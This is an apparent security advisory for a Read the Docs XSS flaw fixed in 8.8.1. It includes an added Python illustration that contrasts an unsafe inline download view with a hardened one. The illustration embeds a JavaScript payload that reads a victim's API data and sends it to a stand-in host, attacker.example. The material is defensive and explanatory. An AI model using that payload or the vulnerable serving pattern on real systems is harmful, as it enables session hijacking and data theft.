PT-2022-28226 · Unknown · Readthedocs

Published

2022-11-10

·

Updated

2022-11-10

None

No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
Name of the Vulnerable Software and Affected Versions: readthedocs, versions prior to 8.8.1
Description: This issue allowed a malicious user to serve arbitrary HTML files from the main application domain (readthedocs.org) by exploiting a vulnerability in the code that serves downloadable content from a project. Because the attacker-controlled HTML was rendered on the same origin as the logged-in user's session, any JavaScript in it ran with that session's privileges. Exploiting this required the attacker to get a logged-in user to visit a malicious URL, after which the attacker's JavaScript could take control of the user's session and make requests to the API/site on the user's behalf. The malicious URL would have looked something like "hxxps://readthedocs.org/projects/attacker-project/downloads/html/version-with-javascript-attack/".
Recommendations: For versions prior to 8.8.1, update to version 8.8.1 or later to resolve the issue.
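As an added example (not Read the Docs' own code, and not the actual fix shipped in 8.8.1), the bug class described above in plain Python: a download view that hands a project's artifact to the browser inline with a Content-Type derived from the stored file's extension, beside a hardened view that always forces a download. The artifact store, the slug check, the handler names and the embedded script are constructed for illustration.

```python
"""Added example (not Read the Docs' own code) of the bug class behind this
advisory: a download endpoint on the main application origin that serves a
project's own HTML inline, beside a hardened version of the same endpoint.
All names, paths and artifacts below are constructed for illustration."""
import mimetypes
import re
from urllib.parse import quote

# Constructed build artifacts keyed by "project/kind/version/filename".
# A project owner fully controls these bytes, so the HTML is attacker-supplied.
ARTIFACTS = {
    "attacker-project/html/version-with-javascript-attack/index.html":
        b"<html><script>fetch('/api/v3/projects/', {credentials: 'include'})"
        b".then(r => r.text())"
        b".then(t => fetch('https://attacker.example/?d=' + encodeURIComponent(t)))"
        b"</script></html>",
    "attacker-project/pdf/stable/attacker-project.pdf":
        b"%PDF-1.4\n% constructed placeholder, not a real document\n",
}

# Hypothetical slug rule: lowercase alphanumerics and inner hyphens only.
SLUG = re.compile(r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$")


def lookup(project, kind, version):
    """Return (key, body) for the artifact stored under project/kind/version, or None."""
    # Slugs are validated before they are joined into the key so a caller cannot
    # escape the project prefix; a general precaution, not the advisory's bug.
    if not all(SLUG.match(s) for s in (project, kind, version)):
        return None
    prefix = f"{project}/{kind}/{version}/"
    for key, body in ARTIFACTS.items():
        if key.startswith(prefix):
            return key, body
    return None


def serve_download_vulnerable(project, kind, version):
    """Weak pattern: Content-Type taken from the stored file's extension and the
    bytes served inline. For a .html artifact the browser renders it as a page
    on the application's origin, with that origin's session cookies attached
    to every request the page's script makes."""
    hit = lookup(project, kind, version)
    if hit is None:
        return 404, {}, b""
    key, body = hit
    ctype, _ = mimetypes.guess_type(key)
    return 200, {"Content-Type": ctype or "application/octet-stream"}, body


def serve_download_hardened(project, kind, version):
    """Hardened: always a download, never a document. The generic type plus
    nosniff stops the browser from interpreting the bytes as markup, the
    attachment disposition stops inline rendering, and the sandbox CSP is a
    backstop for any client that ignores both."""
    hit = lookup(project, kind, version)
    if hit is None:
        return 404, {}, b""
    key, body = hit
    filename = key.rsplit("/", 1)[-1]
    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f"attachment; filename*=UTF-8''{quote(filename)}",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    return 200, headers, body


def renders_on_main_origin(headers):
    """Judge a response the way the browser will: is it rendered as a document
    (and therefore allowed to run script) on the origin that served it?"""
    ctype = headers.get("Content-Type", "").split(";", 1)[0].strip().lower()
    disposition = headers.get("Content-Disposition", "").strip().lower()
    inline = not disposition.startswith("attachment")
    return inline and ctype in {"text/html", "application/xhtml+xml", "image/svg+xml"}


if __name__ == "__main__":
    attack = ("attacker-project", "html", "version-with-javascript-attack")
    for name, view in (("vulnerable", serve_download_vulnerable),
                       ("hardened", serve_download_hardened)):
        status, headers, _ = view(*attack)
        print(f"{name}: {status} renders_on_main_origin={renders_on_main_origin(headers)}")
```

The same check applies to a live endpoint: fetch the download URL with a HEAD request and confirm the response carries `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff` rather than `Content-Type: text/html`. Forcing the download is the fix that keeps the endpoint on the main origin; the other option is to serve project-controlled content only from a separate documentation origin, where no application session cookie is reachable, and never proxy it through the main domain at all.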

XSS

Weakness Enumeration

Related Identifiers

GHSA-98PF-GFH3-X3MP

Affected Products

Readthedocs